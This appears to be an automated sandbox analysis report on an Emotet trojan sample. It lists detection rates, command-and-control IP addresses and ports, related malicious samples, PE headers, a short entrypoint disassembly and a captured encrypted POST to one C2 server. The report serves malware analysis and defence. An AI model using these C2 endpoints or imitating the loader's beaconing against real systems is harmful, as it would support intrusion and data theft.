Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Hidden Files and Directories1	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	System Information Discovery14	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
zeD11Fztx8.exe	83%	Virustotal		Browse
zeD11Fztx8.exe	97%	ReversingLabs	Win32.Trojan.Emotet
zeD11Fztx8.exe	100%	Avira	TR/Crypt.XPACK.Gen
zeD11Fztx8.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.storageservice.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.storageservice.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.zeD11Fztx8.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.zeD11Fztx8.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.storageservice.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.zeD11Fztx8.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.storageservice.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.zeD11Fztx8.exe.1380000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://173.230.145.224:8080/	6%	Virustotal		Browse
http://173.230.145.224:8080/	0%	Avira URL Cloud	safe
http://173.230.145.224:8080/gP	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/	6%	Virustotal		Browse
http://80.86.91.232:7080/	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/h	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/G	0%	Avira URL Cloud	safe
https://79.172.249.82:443/	0%	Avira URL Cloud	safe
http://193.169.54.12:8080/	0%	Avira URL Cloud	safe
http://79.172.249.82:443/$	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/24	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/ed	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/7	0%	Avira URL Cloud	safe
http://79.172.249.82:443/	0%	Avira URL Cloud	safe
http://80.86.91.232:7080/9.54.12:8080/;	0%	Avira URL Cloud	safe
http://173.230.145.224:8080/m	0%	Avira URL Cloud	safe
http://193.169.54.12:8080//	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://173.230.145.224:8080/	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://173.230.145.224:8080/gP	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/h	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/G	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://193.169.54.12:8080/	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://79.172.249.82:443/$	storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/24	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/ed	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/7	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://79.172.249.82:443/	storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://80.86.91.232:7080/9.54.12:8080/;	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://173.230.145.224:8080/m	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://193.169.54.12:8080//	storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.169.54.12	unknown	Germany	49464	ICFSYSTEMSDE	false
80.86.91.232	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
173.230.145.224	unknown	United States	63949	LINODE-APLinodeLLCUS	false
79.172.249.82	unknown	Hungary	43711	SZERVERNET-HU-ASHU	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384980
Start date:	10.04.2021
Start time:	18:47:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	zeD11Fztx8 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@9/0@0/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.7% (good quality ratio 39%) Quality average: 79% Quality standard deviation: 30.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.169.54.12	_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
80.86.91.232	Invoice.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Overdue payment.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emote.exe	Get hash	malicious	Browse	80.86.91.232:4143/
	Question.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	960-27-621120-257 & 960-27-621120-969.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Rechnung.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Open invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	80.86.91.232:7080/
	Scan1782384.doc	Get hash	malicious	Browse	80.86.91.232:7080/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	TRS-11-0221-020.exe	Get hash	malicious	Browse	85.25.177.199
	Payment Advice.exe	Get hash	malicious	Browse	85.25.177.199
	VMtEguRH.exe	Get hash	malicious	Browse	85.25.177.199
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	D12547698.VBS	Get hash	malicious	Browse	85.25.93.141
	sample.exe.exe	Get hash	malicious	Browse	80.86.91.232
	5zc9vbGBo3.exe	Get hash	malicious	Browse	217.172.179.54
	InnAcjnAmG.exe	Get hash	malicious	Browse	217.172.179.54
	yxghUyIGb4.exe	Get hash	malicious	Browse	80.86.91.232
	TaTYytHaBk.exe	Get hash	malicious	Browse	85.25.43.31
	8X93Tzvd7V.exe	Get hash	malicious	Browse	217.172.179.54
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	217.172.179.54
	csrss.bin.exe	Get hash	malicious	Browse	188.138.33.233
	yx8DBT3r5r.exe	Get hash	malicious	Browse	92.51.129.66
	E00636067E.exe	Get hash	malicious	Browse	85.25.177.199
	http___contributeindustry.com_js_engine-rawbin.exe	Get hash	malicious	Browse	85.25.177.199
	z2xQEFs54b.exe	Get hash	malicious	Browse	87.230.93.218
ICFSYSTEMSDE	9fdUNaHzLv.exe	Get hash	malicious	Browse	193.169.54.12
	sample.exe.exe	Get hash	malicious	Browse	193.169.54.12
	yxghUyIGb4.exe	Get hash	malicious	Browse	193.169.54.12
	0HvIGwMmBV.exe	Get hash	malicious	Browse	193.169.54.12
	pitEBNziGR.exe	Get hash	malicious	Browse	193.169.54.12
	_01_.doc	Get hash	malicious	Browse	193.169.54.12
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
LINODE-APLinodeLLCUS	CNTR-NO-GLDU7267089.xlsx	Get hash	malicious	Browse	45.56.127.45
	gunzipped.exe	Get hash	malicious	Browse	45.56.119.148
	frox0cheats.exe	Get hash	malicious	Browse	176.58.123.25
	nDHV6wKWHF.exe	Get hash	malicious	Browse	172.104.164.58
	OfficeConsultPlugin.exe	Get hash	malicious	Browse	109.237.24.104
	RFQ#798606.exe	Get hash	malicious	Browse	45.56.119.148
	Private doc.docm	Get hash	malicious	Browse	109.237.24.104
	lK8vF3n2e7.exe	Get hash	malicious	Browse	172.104.233.225
	newordermx.exe	Get hash	malicious	Browse	45.33.2.79
	sample.exe	Get hash	malicious	Browse	66.228.32.51
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	SMtbg7yHyR.exe	Get hash	malicious	Browse	45.33.54.74
	9fdUNaHzLv.exe	Get hash	malicious	Browse	173.230.145.224
	Private doc.docm	Get hash	malicious	Browse	212.71.251.238
	invoice_document.docm	Get hash	malicious	Browse	212.71.251.238
	sample.exe.exe	Get hash	malicious	Browse	173.230.145.224
	Document_Opener.exe.14.exe	Get hash	malicious	Browse	88.80.186.210
	Audio playback (7656) for joew Camrosa.htm	Get hash	malicious	Browse	192.81.132.201
	Paymonth invoice.exe	Get hash	malicious	Browse	45.79.19.196

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zeD11Fztx8.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007F2560F1290Eh
mov edx, 004011F0h
mov ecx, eax
call 00007F2560F12832h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007F2560F128E9h
mov edx, 004010D0h
mov ecx, eax
call 00007F2560F1280Dh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007F2560F1AC48h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007F2560F1226Ah
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007F2560F1AC31h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 10, 2021 18:47:54.465001106 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.500535011 CEST	443	49738	79.172.249.82	192.168.2.4
Apr 10, 2021 18:47:54.500761032 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.501919985 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.537208080 CEST	443	49738	79.172.249.82	192.168.2.4
Apr 10, 2021 18:47:54.537532091 CEST	443	49738	79.172.249.82	192.168.2.4
Apr 10, 2021 18:47:54.537558079 CEST	443	49738	79.172.249.82	192.168.2.4
Apr 10, 2021 18:47:54.537693977 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.537740946 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.537854910 CEST	49738	443	192.168.2.4	79.172.249.82
Apr 10, 2021 18:47:54.573343992 CEST	443	49738	79.172.249.82	192.168.2.4
Apr 10, 2021 18:48:24.935547113 CEST	49746	8080	192.168.2.4	193.169.54.12
Apr 10, 2021 18:48:27.960725069 CEST	49746	8080	192.168.2.4	193.169.54.12
Apr 10, 2021 18:48:33.976751089 CEST	49746	8080	192.168.2.4	193.169.54.12
Apr 10, 2021 18:49:17.192873955 CEST	49757	8080	192.168.2.4	173.230.145.224
Apr 10, 2021 18:49:17.364305019 CEST	8080	49757	173.230.145.224	192.168.2.4
Apr 10, 2021 18:49:17.870801926 CEST	49757	8080	192.168.2.4	173.230.145.224
Apr 10, 2021 18:49:18.042294979 CEST	8080	49757	173.230.145.224	192.168.2.4
Apr 10, 2021 18:49:18.542711973 CEST	49757	8080	192.168.2.4	173.230.145.224
Apr 10, 2021 18:49:18.714617968 CEST	8080	49757	173.230.145.224	192.168.2.4
Apr 10, 2021 18:49:48.950465918 CEST	49763	7080	192.168.2.4	80.86.91.232
Apr 10, 2021 18:49:51.951813936 CEST	49763	7080	192.168.2.4	80.86.91.232

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49738	79.172.249.82	443	C:\Windows\SysWOW64\storageservice.exe

Timestamp	kBytes transferred	Direction	Data
Apr 10, 2021 18:47:54.501919985 CEST	284	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 468 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 77 ee 51 67 a8 c2 dc 38 20 bc 12 53 17 05 a1 e7 44 fa 23 2e b7 b8 71 13 ca 5f 34 cb 7d 0c be 09 5f d9 5a 5d 85 11 56 95 de d3 de 12 62 eb a8 08 e0 25 70 14 f1 93 c1 00 4a d5 23 a5 0e 77 2e d9 75 a6 89 1b 16 5a c1 dd 31 ce 32 df 13 a0 62 81 87 92 a5 75 31 ed 00 f4 09 08 7f ae 0e 3e f8 65 d0 b5 42 c2 d2 95 50 fe 33 48 54 55 da 3f 44 b3 df eb cb 47 92 31 e0 5c 2c 4d 46 89 f3 f7 e8 28 63 c8 8b 2d 43 6c f6 74 39 33 7f 21 86 82 16 e9 af 01 09 96 57 45 d8 63 20 47 a2 c1 62 3c 2d 74 bb 9d 73 46 51 ff 00 e2 16 99 bd 8a 96 75 c0 cc 9b 6b c8 76 2f 7d 1f 55 df 13 a3 4e 79 3d 0a 7d c1 09 f3 25 b0 1a 81 32 06 db 60 eb aa f9 77 7f 4f d5 65 00 d6 0f 40 ae d6 80 7d 6d d3 ee 85 09 f6 22 03 2f 33 e5 8b 34 8b db c6 73 67 06 01 9b 17 0a 4e 5b 3c f2 f3 aa 73 a9 cd 5f 3c 34 db da c3 54 41 f5 ea 56 26 df 67 5a 61 72 63 60 16 79 a7 db e1 af f6 2f 66 31 e2 88 4f 2d b7 94 7e cd ce 96 27 93 d4 79 59 88 98 23 46 23 99 b4 91 75 8e c1 dc 3b dd db f3 c3 0e 36 95 96 a2 94 42 6d b3 f7 b1 24 01 e7 71 a7 5e 9b 36 26 b2 96 3c 92 d8 90 7f db 79 c4 c3 fa 4e 68 ad ba 03 e9 19 9e d0 8a 2c 33 fb bd b2 75 f0 06 1f 2a 3f 5d 5b 6a 5d b5 14 d0 23 dd 58 78 93 f6 34 14 5e 10 ba 25 6e 54 d1 9d e9 4b b7 80 6f 7e 87 f1 04 26 22 80 65 b6 e1 bb f9 5c a2 ed 76 32 ff 84 0b d3 07 45 59 19 31 0c fe 79 50 52 83 bd d4 f3 e6 d7 cc e7 56 eb b7 23 59 81 8c 16 9c 72 74 e3 4a 61 67 88 c4 db bf 46 0d 23 37 4c 63 74 58 1e 57 77 32 e6 ef 17 cd 09 Data Ascii: wQg8 SD#.q_4}_Z]Vb%pJ#w.uZ12bu1>eBP3HTU?DG1\,MF(c-Clt93!WEc Gb<-tsFQukv/}UNy=}%2`wOe@}m"/34sgN[<s_<4TAV&gZarc`y/f1O-~'yY#F#u;6Bm$q^6&<yNh,3u*?][j]#Xx4^%nTKo~&"e\v2EY1yPRV#YrtJagF#7LctXWw2
Apr 10, 2021 18:47:54.537532091 CEST	284	IN	HTTP/1.1 400 Bad Request Date: Sat, 10 Apr 2021 16:47:54 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: zeD11Fztx8.exe PID: 6720 Parent PID: 5256

General

Start time:	18:47:45
Start date:	10/04/2021
Path:	C:\Users\user\Desktop\zeD11Fztx8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\zeD11Fztx8.exe'
Imagebase:	0x1380000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: zeD11Fztx8.exe PID: 6728 Parent PID: 6720

General

Start time:	18:47:45
Start date:	10/04/2021
Path:	C:\Users\user\Desktop\zeD11Fztx8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\zeD11Fztx8.exe
Imagebase:	0x1380000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
